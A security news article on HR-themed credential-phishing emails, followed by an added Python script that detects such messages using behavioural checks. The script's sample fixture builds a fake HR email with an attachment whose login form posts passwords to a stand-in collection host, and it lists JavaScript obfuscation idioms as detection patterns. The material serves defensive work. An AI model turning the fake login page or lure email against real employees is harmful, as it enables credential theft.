SecureWorld News

Cybercriminals Exploiting HR Policy Announcements in Phishing Attacks

Written by Drew Todd | Fri | Jan 20, 2023 | 9:47 PM Z

As the new year begins, companies and their employees should be aware of a phishing campaign in which attackers impersonate the human resources department to harvest employee credentials.

Cybercriminals are posing as HR officials and sending phishing emails that contain themes related to updated HR policy announcements. These emails typically include links or attachments that are used to steal employee credentials.

Abnormal Security, a cybersecurity solutions provider, has published research on these phishing attacks, highlighting two specific types: payload-based credential phishing attacks and link-based credential phishing attacks.

In payload-based credential phishing attacks, employees receive an email that appears to be from the HR department announcing a new employee benefits package. The email includes an attachment containing a phishing page that mimics a Microsoft login page. The login prompt requests the employee's password, claiming it is necessary to verify their identity in order to access the sensitive information in the attachment.

In link-based credential phishing attacks, the initial email poses as an internal announcement from the HR department highlighting a recent update to the corporate employee handbook. The email includes a link that takes the employee to a phishing page that mimics the company's login page and requests their credentials.

Both of these types of attacks are designed to trick employees into providing their login credentials by disguising the phishing attempts as legitimate internal company announcements.

To protect against these attacks, employees should treat unexpected HR announcements with caution even when they appear to come from an internal address: check where a link actually points before entering credentials, open HR documents by navigating to the company's HR portal directly rather than through the email, and remember that a legitimate internal attachment never needs your password to be opened. Companies should invest in security awareness training that covers this internal-impersonation scenario, deploy email security that inspects links and attachments for credential-harvesting behavior, and require phishing-resistant multi-factor authentication so that a stolen password alone does not grant access.

These attempts can also slip past traditional security tools that rely on known bad indicators (file hashes, URLs, sender reputation): the attached files often contain obfuscated source code and have not previously been detected as malicious, so there is no signature or reputation entry to match against.
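The following script is an added example written for this page; it is not code from SecureWorld or Abnormal Security. It shows how a triage tool can look at behavior rather than known indicators for the two attack types described above: an HTML attachment that renders a password form and posts it to a host outside the organization (payload-based), and a body link whose visible text names the company domain while its href points elsewhere (link-based). It also flags a few JavaScript idioms commonly used to obfuscate such pages. The message, the trusted-domain list and every domain name in it are constructed for the example and are not from the report.

```python
"""Heuristic triage of HR-themed credential-phishing emails (added example)."""
import email
import re
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts where employees are legitimately asked to sign in.
TRUSTED_DOMAINS = {"example-corp.com", "login.microsoftonline.com"}

# JavaScript idioms commonly used to hide a phishing form's real source.
OBFUSCATION_PATTERNS = [
    r"\batob\(", r"\bunescape\(", r"\bdocument\.write\(", r"\beval\(",
    r"String\.fromCharCode", r"[A-Za-z0-9+/]{200,}={0,2}",  # long base64 blob
]


class _PageScanner(HTMLParser):
    """Collect password inputs, form actions and (href, visible text) pairs."""

    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []
        self.links = []
        self._href = None   # href of the <a> currently open, if any
        self._text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "a":
            self._href, self._text = a.get("href") or "", []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(url):
    return (urlparse(url).hostname or "").lower()


def _trusted(host):
    return any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)


def scan_html(html):
    """Return a list of human-readable findings for one HTML part."""
    p = _PageScanner()
    p.feed(html)
    findings = []
    if p.password_inputs:
        ext = sorted({_host(a) for a in p.form_actions if _host(a) and not _trusted(_host(a))})
        if ext:
            findings.append("password form posts to " + ", ".join(ext))
        else:
            findings.append("password form present")
    if any(re.search(pat, html) for pat in OBFUSCATION_PATTERNS):
        findings.append("obfuscated script content")
    for href, text in p.links:
        h = _host(href)
        if h and not _trusted(h) and any(d in text.lower() for d in TRUSTED_DOMAINS):
            findings.append(f"link text mentions trusted domain but href goes to {h}")
    return findings


def scan_message(raw):
    """Parse an RFC 5322 message and scan its HTML body and HTML attachments."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    report = {}
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        name = part.get_filename() or "body"   # attachments carry a filename
        findings = scan_html(part.get_content())
        if findings:
            report[name] = findings
    return report


def build_sample():
    """Construct a message shaped like the described attack (not a real capture)."""
    msg = EmailMessage()
    msg["From"] = "HR Department <hr@example-corp-notices.net>"   # hypothetical sender
    msg["To"] = "employee@example-corp.com"
    msg["Subject"] = "Updated Employee Handbook - action required"
    msg.set_content("Please review the updated handbook.")
    msg.add_alternative(
        '<p>The employee handbook was updated. Review it at '
        '<a href="https://example-corp-hr-portal.net/login">intranet.example-corp.com/handbook</a></p>',
        subtype="html")
    fake_login = (   # attachment rendering a fake login page that posts elsewhere
        '<form action="https://example-corp-hr-portal.net/collect" method="post">'
        '<input name="user"><input type="password" name="pass"></form>'
        '<script>document.write(atob("' + "QUFB" * 80 + '"))</script>')
    msg.add_attachment(fake_login, subtype="html", filename="Benefits_Package_2023.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for part, findings in scan_message(build_sample()).items():
        print(part)
        for f in findings:
            print("  -", f)
```

Run against a real mailbox export, each `.eml` file is passed to `scan_message` as bytes. The checks are deliberately indicator-free: nothing here depends on having seen the attachment hash, the sender or the phishing URL before, which is exactly the gap the article points out. A password form that posts to a trusted host is still reported, since a fake page can relay to the real login after stealing the credentials.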

See the original report from Crane Hassold, Abnormal Security's Director of Threat Intelligence, for more information.

And don't forget to sign up for SecureWorld's upcoming Remote Sessions webcast, 5 Email Attacks to Watch For: How Threat Actors Are Targeting You, during which Hassold will provide an overview of email attacks recently seen by his team and give insight into what cybersecurity professionals can do to stop them.